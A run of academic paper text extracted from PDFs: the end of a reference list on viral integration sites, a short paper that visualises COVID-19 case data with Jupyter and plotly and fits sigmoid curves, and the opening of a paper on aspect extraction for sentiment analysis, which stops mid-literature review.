10.1101/gr.229102. Krzywinski MI, Schein JE, Birol I, Connors J, Gascoyne R, Horsman D, Jones SJ, Marra MA. 2009. Circos: an information aesthetic for comparative genomics. Genome Research 19(9):1639–1645. LaFave MC, Varshney GK, Gildea DE, Wolfsberg TG, Baxevanis AD, Burgess SM. 2014. MLV integration site selection is driven by strong enhancers and active promoters. Nucleic Acids Research 42(7):4257–4269 DOI 10.1093/nar/gkt1399. Li MA, Pettitt SJ, Eckert S, Ning Z, Rice S, Cadianos J, Yusa K, Conte N, Bradley A. 2013. The piggyBac transposon displays local and distant reintegration preferences and can cause mutations at noncanonical integration sites. Molecular and Cellular Biology 33(7):1317–1330 DOI 10.1128/MCB.00670-12. Li L, Zhang D, Li P, Damaser M, Zhang Y. 2015. Virus integration and genome influence in approaches to stem cell based therapy for andro-urology. Advanced Drug Delivery Reviews 82–83:12–21 DOI 10.1016/j.addr.2014.10.012. Pingoud A, Jeltsch A. 2001. Structure and function of type II restriction endonucleases. Nucleic Acids Research 29(18):3705–3727 DOI 10.1093/nar/29.18.3705. Riviere I, Dunbar CE, Sadelain M. 2012. Hematopoietic stem cell engineering at a crossroads. Blood 119(5):1107–1116 DOI 10.1182/blood-2011-09-349993. Roadmap Epigenomics Consortium, Kundaje A, Meuleman W, Ernst J, Bilenky M, Yen A, Heravi-Moussavi A, Kheradpour P, Zhang Z, Wang J, Ziller MJ, Amin V, Whitaker JW, Schultz MD, Ward LD, Sarkar A, Quon G, Sandstrom RS, Eaton ML, Wu Y-C, Pfenning AR, Wang X, Claussnitzer M, Liu Y, Coarfa C, Harris RA, Shoresh N, Epstein CB, Gjoneska E, Leung D, Xie W, Hawkins RD, Lister R, Menzel et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.198 12/13 https://peerj.com http://dx.doi.org/10.1126/science.1105136 http://dx.doi.org/10.1093/nar/gkq963 http://dx.doi.org/10.1038/mt.2016.11 http://dx.doi.org/10.1128/JVI.03419-13 http://dx.doi.org/10.1101/gr.229102 http://dx.doi.org/10.1093/nar/gkt1399 http://dx.doi.org/10.1128/MCB.00670-12 http://dx.doi.org/10.1016/j.addr.2014.10.012 http://dx.doi.org/10.1093/nar/29.18.3705 http://dx.doi.org/10.1182/blood-2011-09-349993 http://dx.doi.org/10.7717/peerj-cs.198 Hong C, Gascard P, Mungall AJ, Moore R, Chuah E, Tam A, Canfield TK, Hansen RS, Kaul R, Sabo PJ, Bansal MS, Carles A, Dixon JR, Farh K-H, Feizi S, Karlic R, Kim A-R, Kulkarni A, Li D, Lowdon R, Elliott G, Mercer TR, Neph SJ, Onuchic V, Polak P, Rajagopal N, Ray P, Sallari RC, Siebenthall KT, Sinnott-Armstrong NA, Stevens M, Thurman RE, Wu J, Zhang B, Zhou X, Beaudet AE, Boyer LA, De Jager PL, Farnham PJ, Fisher SJ, Haussler D, Jones SJM, Li W, Marra MA, McManus MT, Sunyaev S, Thomson JA, Tlsty TD, Tsai L-H, Wang Wei, Waterland RA, Zhang MQ, Chadwick LH, Bernstein BE, Costello JF, Ecker JR, Hirst M, Meissner A, Milosavljevic A, Ren B, Stamatoyannopoulos JA, Wang T, Kellis M. 2015. Integrative analysis of 111 reference human epigenomes. Nature 518(7539):317–330 DOI 10.1038/nature14248. Robinson JT, Thorvaldsdóttir H, Winckler W, Guttman M, Lander ES, Getz G, Mesirov JP. 2011. Integrative genomics viewer. Nature Biotechnology 29(1):24–26 DOI 10.1038/nbt.1754. Roth SL, Malani N, Bushman FD. 2011. Gammaretroviral Integration into Nucleosomal Target DNA In Vivo. Journal of Virology 85(14):7393–7401 DOI 10.1128/JVI.00635-11. Sandve GK, Gundersen S, Johansen M, Glad I, Gunathasan K, Holden L, Holden M, Liestl K, Nygrd S, Nygaard V, Paulsen J, Rydbeck H, Trengereid K, Clancy T, Drabls F, Ferkingstad E, Kala M, Lien T, Rye MB, Frigessi A, Hovig E. 2013. The Genomic HyperBrowser: an analysis web server for genome-scale data. Nucleic Acids Research 41(W1):W133–W141 DOI 10.1093/nar/gkt342. Shao W, Shan J, Kearney MF, Wu X, Maldarelli F, Mellors JW, Luke B, Coffin JM, Hughes SH. 2016. Retrovirus Integration Database (RID): a public database for retroviral insertion sites into host genomes. Retrovirology 13(1):Article 47 DOI 10.1186/s12977-016-0277-6. Wilson MH, Coates CJ, George AL. 2007. PiggyBac transposon-mediated gene transfer in human cells. Molecular Therapy 15(1):139–145 DOI 10.1038/sj.mt.6300028. Wu X, Li Y, Crise B, Burgess SM. 2003. Transcription start regions in the human genome are favored targets for MLV integration. Science 300(5626):1749–1751 DOI 10.1126/science.1083413. Menzel et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.198 13/13 https://peerj.com http://dx.doi.org/10.1038/nature14248 http://dx.doi.org/10.1038/nbt.1754 http://dx.doi.org/10.1128/JVI.00635-11 http://dx.doi.org/10.1093/nar/gkt342 http://dx.doi.org/10.1186/s12977-016-0277-6 http://dx.doi.org/10.1038/sj.mt.6300028 http://dx.doi.org/10.1126/science.1083413 http://dx.doi.org/10.7717/peerj-cs.198 work_fy4lcnl2qrai3izcaywzso72bi ---- Sample Paper Title International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 DOI: 10.21307/ijanmc-2020-038 58 Data Visualization Analysis of COVID-19 Epidemic Situation Yang Tao Nanchang Institute of Science and Technology Nanchang, China E-mail: taoyangxp@163.com Abstract—2019 Novel Coronavirus (COVID-19) has brought immeasurable losses and huge impact to the world. For human health, many Centres for Disease Control(CDC) in various countries around the world are actively collecting data and doing a good job in virus prevention and control. The real-time release of the epidemic situation, with analysis and prediction, is a very effective method to combat the epidemic. By studying the situation of epidemic data, based on Jupyter Notebook, this paper gives the visual analysis process of COVID-19 epidemic data, and carries out specific analysis and implementation. And then it estimates the coronavirus converges roughly using sigmoid fitting. Although the sigmoid fitting tend to underestimate the curve, its actual value tend to be more than sigmoid curve estimation. The proposed data visualization analysis method could effectively display the status of the COVID-19 epidemic situation, hoping to help control and reduce the impact of the COVID-19 epidemic. Keywords—COVID-19; Data Visualization; Situation Dashboard; Jupyter Notebook; Epidemic Situation I. IN TR OD UC TI ON 2019 Novel Coronavirus (2019-nCoV) is a virus (more specifically, a coronavirus) identified as the cause of an outbreak of respiratory illness. A growing number of patients reportedly have indicated person-to- person spread is occurring. At this time, it’s unclear how easily or sustainably this virus is spreading between people. Therefore, it is very important to visually analyse the COVID-19 Epidemic Situation, which helps to control the impact of the COVID-19 epidemic and reduce losses. II. LO AD DATA The dataset has daily level information on the number of affected cases, deaths and recovery from 2019 novel coronavirus. This is a time series data and so the number of cases on any given day is the cumulative number. The data is available from 22 Jan, 2020. We can download latest data from Johns Hopkins University github repository: https://github.com/CSSEGISandData/COVID- 19[1].We can also grab data from various Centres for Disease Control [2-6]. The data folder contains the previously posted dashboard case reports from Jan 21 to Feb 14, 2020 for the coronavirus COVID-19 (formerly known as 2019- nCoV). We will refer to the data provided in the new folder, entitled "csse_covid_19_data folder". Moving forward they will be updating daily case reports into this new folder. Additionally, the previously uploaded data from Jan 21-Feb 14, 2020 is also included in the new folder, and it has been cleaned and re-formatted to address inconsistencies in the time zone and update frequency that resulted during the transition from our manual updates to automated updates (which took place on Feb 1, 2020. The new folder now includes one case report per day, from the same time of day. This will be the standard moving forward (as of Feb 14, 2020). That is the data we will load for visualization analysis. Main file in this dataset is covid_19_data.csv and the detailed descriptions are below.  Sno - Serial number  ObservationDate - Date of the observation in MM/DD/YYYY. We will convert ObservationDate and Last Update to datetime since they are currently taken as object. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 59  Province/State - Province or state of the observation (Could be empty when missing)  Country/Region - Country of observation  Last Update - Time in UTC at which the row is updated for the given province or country. (Not standardised and so please clean before using it)  Confirmed - Cumulative number of confirmed cases till that date  Deaths - Cumulative number of deaths till that date  Recovered - Cumulative number of recovered cases till that date III. VISU ALIZ ATI O N AN ALY SIS For the purpose of data visualization, we mainly use the Python-based tools of Jupyter Notebook[7] and plotly[8]. The Jupyter Notebook is an open-source web application that allows you to create and share documents that contain live code, equations, visualizations and narrative text. Uses include: data cleaning and transformation, numerical simulation, statistical modeling, data visualization, machine learning, and much more. The plotly visualization is heavy used in this kernel so that we can interactively see the figure, map etc. As a side effect, it might take a little bit more time to initialize the Python environment and to load the kernel. Then grab data from the Internet and load the data. A. Worldwide Trend When we see the confirmed cases in worldwide, it just look like exponential growth curve. The number is increasing very rapidly especially recently. As a further matter, daily new confirmed cases started not increasing from April 4. After that, flat trend continues so far, as shown in Figure 1. Figure 1. Worldwide Confirmed/Death Cases Over Time Moreover, when we check the growth in log-scale below figure, we can see that the speed of confirmed cases growth rate slightly increases when compared with the beginning of March and end of March. In spite of the Lockdown policy in Europe or US, the number is still increasing rapidly, as shown in Figure2. Figure 2. Worldwide Confirmed/Death Cases Over Time (Log scale) It looks like fatalities curve is just shifted the confirmed curve to below in log-scale, which means mortality rate is almost constant. We see that mortality rate is kept almost 3%, however it is slightly increasing gradually to go over 7% at the end of April. Europe & US has more seriously infected by Coronavirus recently, and mortality rate is high in these regions, as shown in Figure 3. It might be because when too many people get coronavirus, the country cannot provide enough medical treatment. Figure 3. Worldwide Mortality Rate Over Time B. Country-wise Growth There are 187 countries in the dataset. How's the distribution of number of confirmed cases by country? It is difficult to see all countries so let's check top countries as shown in Figure 4. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 60 Figure 4. Confirmed Cases/Deaths on 2020-05-06 Now US, Italy and Spain has more confirmed cases than China, and we can see many Europe countries in the top. Korea also appears in relatively top despite of its population, this is because Korea executes inspection check aggressively. Let's check these major country's growth by date. As we can see, Coronavirus hit China at first but its trend is slowing down in March which is good news. Bad news is 2nd wave comes to Europe (Italy, Spain, Germany, France, UK) at March. But more sadly 3rd wave now comes to US, whose growth rate is much faster than China, or even Europe. Its main spread starts from middle of March and its speed is faster than Italy. Now US seems to be in the most serious situation in terms of both total number and spread speed. Now let’s see the confirmed cases for the top 30 countries, as shown in Figure 5. Figure 5. Confirmed Cases for top 30 country as of 2020-05-06 In terms of number of fatalities, Europe & US are serious situation now, as shown in Figure 6. Many countries have more fatalities than China now, including US, Italy, Spain, France, UK, Iran Belgium, Germany, Brazil, Netherlands. US's spread speed is the fastest, US's fatality cases become top1 on Apr 10th. Figure 6. Fatalities for top 30 country as of 2020-05-06 Now let's see mortality rate by country, as shown in Figure 7. Italy is the most serious situation, whose mortality rate is over 10% as of 2020/3/28.We can also find countries from all over the world when we see top mortality rate countries, as shown in Figure 7. Iran/Iraq from Middle East, Philippines & Indonesia from tropical areas. Spain, Netherlands, France, and UK form Europe etc. It shows this coronavirus is really worldwide pandemic. The countries whose mortality rate is low are shown in Figure 8. By investigating the difference between above & below countries, we might be able to figure out what is the cause which leads death. Be careful that there may be a case that these country's mortality rate is low due to these country does not report/measure fatality cases properly. Figure 7. Mortality rate HIGH: top 30 countries on 2020-05-06 International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 61 Figure 8. Mortality rate HIGH: top 30 countries on 2020-05-06 Let's see number of confirmed cases on map. Again we can see Europe, US, Middle East (Turkey, Iran) and Asia (China, Korea) are red, as shown in Figure 9. Figure 9. Countries with Confirmed Cases on 2020-05-06 The number of fatalities on map is shown as Figure 10 and the mortality rate map is shown as Figure 11. When we see mortality rate on map, we see Europe (especially Italy) is high. Also we notice Middle East (Iran, Iraq) is high. When we see tropical area, I wonder why Philippines and Indonesia are high while other countries (Malaysia, Thai, Vietnam, as well as Australia) are low. For Asian region, Korea's mortality rate is lower than China or Japan, I guess this is due to the fact that number of inspection is quite many in Korea[9-10]. From the mortality rate map, it seems that mortality rate is especially high in Europe region, compared to US or Asia. Figure 10. Countries with fatalities on 2020-05-06 Figure 11. Countries with mortality rate on 2020-05-06 Why mortality rate is different among country? What kind of hint is hidden in this map? Especially mortality rate is high in Europe and US, is there some reasons? There is one interesting hypothesis that BCG vaccination[11]. C. Daily NEW Confirmed Cases Trend Let’s see the DAILY new cases trend as shown in Figure12. Figure 12. DAILY NEW Confirmed cases worldwide International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 62 We find from the figure 12:  China has finished its peak at Feb 14, new confirmed cases are surpressed now.  Europe&US spread starts on mid of March, after China slows down.  As effect of lock down policy in Europe (Italy, Spain, Germany, France) now comes on the figure, the number of new cases are not so increasing rapidly at the end of March.  Current US new confirmed cases are the worst speed, recording worst speed at more than 30k people/day at peak. Daily new confirmed cases start to decrease from April 4 or April 10.  After that we can see a weekly trend that the confirmed cases becomes small on Monday. I think this is because people don't (or cannot) get medical care on Sunday so its reporting number is low on Sunday or Monday. D. Zoom up to US As we can see, the spread is fastest in US now, at the end of March. Let's see in detail what is going on in US. When we see inside of the US, we can see only New York, and its neighbour New Jersey dominates its spread and are in serious situation. The number of New York confirmed cases is over 50k, while other states are less than about 5k confirmed cases, as shown in Figure 13. Figure 13. Confirmed cases in US on 2020-05-06 Mortality rate in New York seems not high, around 2% for now, as shown in Figure 14. Figure 14. Mortality rate in US on 2020-05-06 All state is US got affected from middle of March, and now growing exponentially. In New York, less than 1k people are confirmed on March 16, but more than 50k people are confirmed on March 30. 50 times explosion in 2 weeks! The confirmed cases by state in US is show in Figure 15. Figure 15. Confirmed cases by state in US, as of 2020-05-06 E. Zoom up to Europe When we look into the Europe, its Northern & Eastern areas are relatively better situation compared to Eastern & Southern areas. The map of European Countries with Confirmed Cases is shown as Figure 16 and Figure 17. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 63 Figure 16. European Countries with Confirmed Cases, as of 2020-05-06 Figure 17. Confirmed cases by country in Europe, as of 2020-05-06 Especially Italy, Spain, German, France, UK are in more serious situation. Number of confirmed cases rapidly increasing in Russia now (as of May 1), Russia is now potentially very dangerous situation. When we check daily new cases in Europe(as shown in Figure 18), we notice:  UK and Russia daily growth are more than Italy now. These countries are potentially more dangerous now.  Italy new cases are not increasing since March 21, maybe due to lock-down policy is started working. Figure 18. DAILY NEW Confirmed cases by country in Europe F. Zoom up to Asia In Asia, China & Iran have many confirmed cases, followed by South Korea & Turkey. Asian Countries with Confirmed Cases is as shown in Figure 19. Figure 19. Confirmed cases by country in Asia, as of 2020-05-06 The coronavirus hit Asia in early phase, how is the situation now? China & Korea is already in decreasing phase. Unlike China or Korea, daily new confirmed cases were kept increasing on March or April, especially in Iran or Japan. But the number is started to decrease now on these country as well, as shown in Figure 20. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 64 Figure 20. DAILY NEW Confirmed Cases in Asia, as of 2020-05-06 IV. ES TIM ATI O N Of course everyone is wondering when the coronavirus converges. Let's estimate it roughly using sigmoid fitting. I referenced two kernels[12-13] for original ideas. The fitting result is shown in Figure 21. Sigmoid fitting with all latest data Figure 21. Sigmoid fitting with all latest data If believe above curve, the number of confirmed cases is slowing down now and it will be converging around the beginning of May in most of the country. It might take until beginning on June in US. Let's try validation by excluding last 7 days data, as shown in Figure 22. Figure 22. Sigmoid fitting without last 7days data Now noticed that sigmoid fitting tend to underestimate the curve, and its actual value tend to be more than sigmoid curve estimation. Therefore, need to be careful to see sigmoid curve fitting data; actual situation is likely to be worse than the previous figure trained with all data. V. CO NC LUS IO N Based on data available on May 6, the paper showed the visualization of the COVID-19 Epidemic Situation, including the worldwide trend, country-wide growth, and so on. Then it estimated when the coronavirus converges roughly using sigmoid fitting. The model's estimates and predictions closely match reported confirmed cases. Therefore the proposed data visualization analysis method could effectively display the status of the COVID-19 epidemic situation, hoping to help control and reduce the impact of the COVID-19 epidemic. The next steps include applying the method to global COVID-19 death data into small regions, as provinces. The method of visualization analysis could also be used to evaluate population mortality and the spread of other diseases. AC KN O WLE D GME N TS The authors wish to thank Corochann, who is an Engineer at Preferred Networks in Tokyo. This work was supported in part by the Ph.D. Research Initiation Fund of Nanchang Institute of Science and Technology with the Project (No. NGRCZX-18-01) and supported by Robot and Intelligent System Research Centre of Artificial Intelligence College of Nanchang Institute of Science and Technology (No.NGYZY-20-005). International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 65 REFE REN CES [1] https://www.kaggle.com/benhamner/covid-19-forecasting-challenges- week-2-data-prep. [2] China CDC (CCDC): http://weekly.chinacdc.cn/news/TrackingtheEpidemic.htm [3] Taiwan CDC: https://sites.google.com/cdc.gov.tw/2019ncov/taiwan?authuser=0 [4] US CDC: https://www.cdc.gov/coronavirus/2019-ncov/index.html [5] Government of Canada: https://www.canada.ca/en/public- health/services/diseases/coronavirus.html [6] European Centre for Disease Prevention and Control (ECDC): https://www.ecdc.europa.eu/en/geographical-distribution-2019-ncov- cases [7] Jupyter notebook - Project Jupyter | Home. https://jupyter.org/ [8] Plotly: The front-end for ML and data science models. https://plotly.com/ [9] South Korea launches 'drive-thru' coronavirus testing facilities as demand soars. https://www.japantimes.co.jp/news/2020/03/01/asia- pacific/science-health-asia-pacific/south-korea-drive-thru- coronavirus/#. XoAmw4j7RPY [10] Coronavirus: Why Japan tested so few people. https://asia.nikkei.com/Spotlight/Coronavirus/Coronavirus-Why- Japan-tested-so-few-people [11] If I were North American/West European/Australian, I will take BCG vaccination now against the novel coronavirus pandemic. https://www.jsatonotes.com/2020/03/if-i-were-north- americaneuropeanaustral.html [12] Sigmoid per country. https://www.kaggle.com/group16/sigmoid-per- country-no-leakage [13] COVID-19 growth rates per country. https://www.kaggle.com/mikestubna/covid-19-growth-rates-per- country. work_fycwsprctvej7fdxxin7bffb7a ---- A supervised scheme for aspect extraction in sentiment analysis using the hybrid feature set of word dependency relations and lemmas A supervised scheme for aspect extraction in sentiment analysis using the hybrid feature set of word dependency relations and lemmas Bhavana R. Bhamare1 and Jeyanthi Prabhu2 1 Department of Computer Science and Engineering, Sathyabama Institute of Science and Technology, Chennai, Tamilnadu, India 2 Department of Information Technology, Sathyabama Institute of Science and Technology, Chennai, Tamilnadu, India ABSTRACT Due to the massive progression of the Web, people post their reviews for any product, movies and places they visit on social media. The reviews available on social media are helpful to customers as well as the product owners to evaluate their products based on different reviews. Analyzing structured data is easy as compared to unstructured data. The reviews are available in an unstructured format. Aspect-Based Sentiment Analysis mines the aspects of a product from the reviews and further determines sentiment for each aspect. In this work, two methods for aspect extraction are proposed. The datasets used for this work are SemEval restaurant review dataset, Yelp and Kaggle datasets. In the first method a multivariate filter-based approach for feature selection is proposed. This method support to select significant features and reduces redundancy among selected features. It shows improvement in F1-score compared to a method that uses only relevant features selected using Term Frequency weight. In another method, selective dependency relations are used to extract features. This is done using Stanford NLP parser. The results gained using features extracted by selective dependency rules are better as compared to features extracted by using all dependency rules. In the hybrid approach, both lemma features and selective dependency relation based features are extracted. Using the hybrid feature set, 94.78% accuracy and 85.24% F1-score is achieved in the aspect category prediction task. Subjects Artificial Intelligence, Data Mining and Machine Learning Keywords Feature extraction, Aspect based sentiment analysis, Machine learning, Natural language processing, Support vector machine INTRODUCTION Quick improvements in e-commerce websites lead customers to purchase and analyze products online. Also, it allows end-users to express their views/opinions related to an item and services by means of reviews. These opinions are useful for other users to decide about the purchase of a product. These are also helpful to manufacturers to enhance the quality of their items and services and they may know what exactly customers want. In any case, it is hard for an individual to analyze a large number of reviews and rate them How to cite this article Bhamare BR, Prabhu J. 2021. A supervised scheme for aspect extraction in sentiment analysis using the hybrid feature set of word dependency relations and lemmas. PeerJ Comput. Sci. 7:e347 DOI 10.7717/peerj-cs.347 Submitted 30 March 2020 Accepted 2 December 2020 Published 5 February 2021 Corresponding author Bhavana R. Bhamare, kanawadebr@gmail.com Academic editor Sebastian Ventura Additional Information and Declarations can be found on page 18 DOI 10.7717/peerj-cs.347 Copyright 2021 Bhamare and Prabhu Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.347 mailto:kanawadebr@�gmail.�com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.347 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ according to various aspects of the product. Hence, it is required to analyze all users’ views and classify them with respect to different aspects. Sentiment analysis (SA) has a significant role in analyzing and summarizing all the opinions. SA is the analysis of the reviews given by the people about any product on various e-commerce websites or social media, etc. SA can be done at different levels of granularity (Hu & Liu, 2004), they are aspect, sentence and document level. Aspect level SA recognizes the polarity of each individual aspect of a product. It includes tasks like aspect term extraction and opinion target extraction etc. In sentence level SA, polarity is predicted for the complete sentence. It deals with the recognition of statements as objective or subjective, while in document level SA the polarity is predicted for the complete review or document. It extracts opinion bearing words and detects its polarity. The work in this paper focuses on ABSA. Aspect is nothing but the component or attribute of the product. In other words, ABSA is a SA method that finds the aspects/attributes of a product and afterward designates an estimation level (positive, negative or neutral) to each attribute. The large distinction between SA and ABSA is that the former just distinguish the feeling of full text, while the latter breaks down every content to recognize different aspects and decide the relating sentiment for each one of them. Aspects can be implicit or explicit based on the presence of aspect terms. Statements with implicit aspects do not contain direct aspect terms. Instead, we need to recognize it from the words or expressions expressed in the user reviews. The following two sentences are reviews about mobile phones. For a mobile phone, aspects can be a battery, camera, audio, memory, processing speed, etc. In sentence 1, the aspect term is a camera and the sentiment specifying word is “good” that is, sentiment is positive. In this sentence, the camera word is not used directly instead it is signified by the phrase “picture quality”. So the aspects may be specified explicitly or implicitly in the sentence. The implicit aspect in the second sentence is a battery which is represented by the word “charging”. Sentence 1: The picture quality of this mobile is good. Sentence 2: It does not need charging for a long time. This section focuses on exhaustive literature review which covers various aspects of contemporary area of research. The survey focuses on ABSA applications, aspect extraction and selection techniques suggested in earlier works, knowledge-based approaches to consider semantic features, topic-based methods for selecting features that are independent of the subject matter and deep CNN approach. ABSA analysis has a number of applications such as movie rating prediction, restaurant recommendation, financial news analysis (Ahmad, Cheng & Almas, 2007), political predictions, etc. Benkhelifa, Bouhyaoui & Laallam (2019) proposed a system that will rank numerous cooking recipes which helps to choose the finest by using reviews of users. This system also makes use of metadata of YouTube videos and improves the performance. It has performed three tasks subjectivity detection, aspect extraction, and sentiment classification. For both subjectivity detection and sentiment classification, features are Bhamare and Prabhu (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.347 2/22 http://dx.doi.org/10.7717/peerj-cs.347 https://peerj.com/computer-science/ selected using TF-IDF feature weighting method and for classification NB and SVM classifiers are used. In both, the SVM algorithm outperforms the NB classifier. The aspect extraction is done with a rule-based approach using Stanford dependency parser. Akhtar et al. (2017) proposed a recommender system that endorses the best hotel for the user. In this approach, first, the topic modeling technique is used to recognize concealed data and aspects. Further, the sentiment analysis is used on classified sentences and finally, summarization is done. For topic modeling, the MALLET tool is used and sentiment analysis is done using the SentiWordNet corpus. As reviews are summarized based on aspect category, it gives a better understanding of the reviews. Afzaal, Usman & Fong (2019) proposed a framework for mobile tourism app using ABSA. With POS tagger, the nouns and noun phrases are extracted seeing them as candidate features to decide aspect category. The co-referential aspects are clustered by means of WordNet and aspects with occurrence count more than 10 are selected that assisted to extract explicit aspects. A decision tree approach is used to pull out implicit aspects. Sentiment analysis is done using five different classifiers, amongst all NBM classifier shown good results with an accuracy of 88.08% on the restaurant review dataset. Vanaja & Belwal (2018) and Anand & Naorem (2016) analyzed Amazon customer surveys and Amazon movie reviews, respectively. Vanaja & Belwal (2018) distinguished among Naïve Bayes and SVM algorithm on sentiment analysis task. In it, features are extracted by applying part of speech tagging and selecting nouns, verbs, adverbs, adjectives, and pronouns from each review. Frequent features are selected using the Apriori algorithm. These features are pruned by removing stop words and then the classifiers are applied to determine the class labels as positive, negative or neutral. The NB classifier outperformed the SVM with accuracy 90.423%. Anand & Naorem (2016) performed ABSA in two stages: to detect aspect and determine sentiment for the aspect. The Stanford dependency parser is applied using some handcrafted rules to extract aspect-sentiment pairs. The polarity of extracted sentiment words is determined using the SentiWordNet corpus. To detect the aspect some aspect clue words are used. These clue words are chosen by three approaches: manual labeling, clustering, and review guided clustering. El Hannach & Benkhalifa (2018) proposed crime identification using implicit aspects and it is done on the twitter dataset. This research is carried out in three main stages: implicit aspect sentence detection, implicit aspect term extraction and implicit aspect identification (IAI). The features used for this work are adjectives and verbs along with its WordNet synonyms selected using Term Frequency-Inverse Class Frequency (TF-ICF). The classifiers used for IAI are MNB, SVM and RF. This work has shown that the usage of TF-ICF achieves better compared to TF-IDF. ABSA can be done using different approaches. Many approaches focus on feature extraction and selection process. Features can be selected using strategies like occurrence frequency, syntax-based rules, semantics or the hybrid approach. Significant features are more supportive to predict the aspect category and sentiment class. A comparative study of numerous existing language rule-based aspect extraction methods is quantified by Ruskanda, Widyantoro & Purwarianti (2018). Observations demonstrate that the accuracy of a language rule-based aspect extraction technique is broadly resolved by the Bhamare and Prabhu (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.347 3/22 http://dx.doi.org/10.7717/peerj-cs.347 https://peerj.com/computer-science/ completeness and accuracy of rules compared to other technologies. Poria et al. (2014) proposed a dependency rule-based methodology to resolve the issue of aspect extraction from reviews of products. In this research, authors used Stanford parser to get the dependency tree and further some dependency rules are applied to mine aspects from a sentence. This work indicates significant improvement as it works on the extraction of relevant features. Rana & Cheah (2017a), Rana & Cheah (2017b) and Rana & Cheah (2019) worked on ruled based methods for extracting product features. Rana & Cheah (2017a) presented a two-fold rule-based approach to extract aspects. In this, first, fold extract aspects related to domain-independent opinions and second fold extract aspects related to domain-dependent opinions. The author also applied frequency and similarity measure to enhance the accuracy of the aspect extraction of an established system. Rana & Cheah (2017b) proposed a two-level aspect pruning approach that can reduce inappropriate aspects. The author used the sequential pattern-based model to extract noun phrases that represent aspects. Aspect elimination is done by estimating the frequency of each word and picking the most frequent aspects. Further, the semantic similarity measure is used to select non-frequent features. Asghar et al. (2019) proposed a framework performing aspect extraction, sentiment classification, and summary generation. In this work, heuristic rules are used for aspect-sentiment pair extraction. The aspect terms are grouped based on their co-reference PMI value and assigned one aspect category. The sentiment classification is done using the SentiWordNet lexicon. In this work, a summary is generated as a list of positive and negative aspects individually with their sentiment scores. Shafie et al. (2018) presented research that uses numerous types of dependency relation for extracting candidate aspects from user review. Firmanto & Sarno (2019) proposed an aspect-based sentiment analysis method utilizing grammatical rules, word similarity and SentiCircle. The proposed method starts with the extraction of candidate aspects using grammatical rules. Authors used word embedding and word similarity in preprocessing steps for aspect categorization. For keyword extraction, TF-ICF is used and in the end, SentiCircle is utilized to find sentiment polarity. Agarwal et al. (2015) presented a concept based approach using dependency rules. In this research, the authors used some dependency rules for feature extraction. The extracted features are enriched by adding some commonsense knowledge extracted from ConceptNet. These features are pruned by means of the mRMR feature reduction approach and sentiment classes are predicted using an SVM classifier. Asghar et al. (2017) used a rule-based classification system to enhance the sentiment classification of reviews in online communities. The essential purpose of this work is to improve the overall performance of sentiment analysis by considering additional features like modifiers, emoticons, domain-related phrases and negations. Kang & Zhou (2017) proposed RubE—unsupervised rule-based techniques to extract subjective and objective features from online consumer reviews. In this work, objective features are collected by integrating part-whole relations and patterns that are specific to reviews. Subjective features collected by applying double propagation with indirect dependency and comparative construction. In ABSA, after feature extraction, feature pruning is necessary to avoid the risk of overfitting and improve accuracy. Reduced features require less time for training. Bhamare and Prabhu (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.347 4/22 http://dx.doi.org/10.7717/peerj-cs.347 https://peerj.com/computer-science/ The statistical weight of features can be used to reduce the feature set. So selecting or proposing a feature selection strategy is an open research issue. Manek et al. (2017) presented a Gini Index based feature selection technique with SVM classifier that classifies sentiment of movie reviews. This method verified that the Gini Index improved classification accuracy compared to other feature weighting techniques. Liu et al. (2018) proposed a Weighted Gini Index (WGI) feature selection method for imbalanced data. Various algorithms namely Chi-square, F-statistic and Gini index feature selection are compared with proposed system. According to their work F-statistic provides the best performance in the minority class. If the numbers of selected features are more, WGI feature selection lead to better performance. Uysal (2016) proposed an enhanced global feature selection system which enhances the classification performance. It offers an improved approach to filter-based feature selection. The Improved Global Feature Selection Scheme (IGFSS) is the combination of the global feature selection technique and the local feature selection method. The performance of classification is significantly improved with the IGFSS approach. Many researchers merged commonsense knowledge, the semantics of features with ontology to improve the accuracy of aspect extraction and sentiment classification. Schouten, Frasincar & de Jong (2017) and Schouten & Frasincar (2018) proposed ontology- enhanced aspect-based sentiment analysis. Schouten, Frasincar & de Jong (2017) concentrated on a knowledge-driven solution with the aim to complement standard machine learning (ML) method. The writers encoded the domain knowledge into a knowledge repository/ontology. In this research, both aspect detection and aspect sentiment analysis is done. It shows that the embedding of commonsense knowledge with ontology-based features improve the performance of classification. For both tasks the libsvm classifier is used. Schouten & Frasincar (2018) prepared ontology with three classes like SentimentMention, AspectMention, and Sentiment Value. The ontology is generated using an onto-clean methodology. If the ontology does not predict any class, then the class prediction is done using the Bag-of-Words backup model. This research signifies that encoding domain knowledge in ontology advances the result of sentiment classification. De Kok et al. (2018a) and De Kok et al. (2018b) proposed an ontology centered approach for review level aspect-based sentiment analysis. In this work, they mainly focus on ontology-enhanced methods that complement a standard ML algorithm. For these two different algorithms are used, a review-based and a sentence aggregation algorithm. Their work contains feature generators and feature adaptors. Several feature generators are independent of the ontology which are aspect, sentence count, lemma and several are dependent on an ontology which are ontology concepts, sentiment count. Also, they used several feature adaptors which are ontology concept score, negation handling, synonyms, weight, word window, etc. Ma, Peng & Cambria (2018) improved the LSTM network with a hierarchical attention mechanism. The main influence of this work is the integration of commonsense knowledge of sentiment related concepts into an attentive LSMT. This research accomplished the two tasks that is, aspect extraction and sentiment classification. Zeng et al. (2019) used a convolutional neural network (CNN) with linguistic resources and gating mechanism for aspect-based sentiment analysis (ABSA). Al-Smadi et al. (2019) Bhamare and Prabhu (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.347 5/22 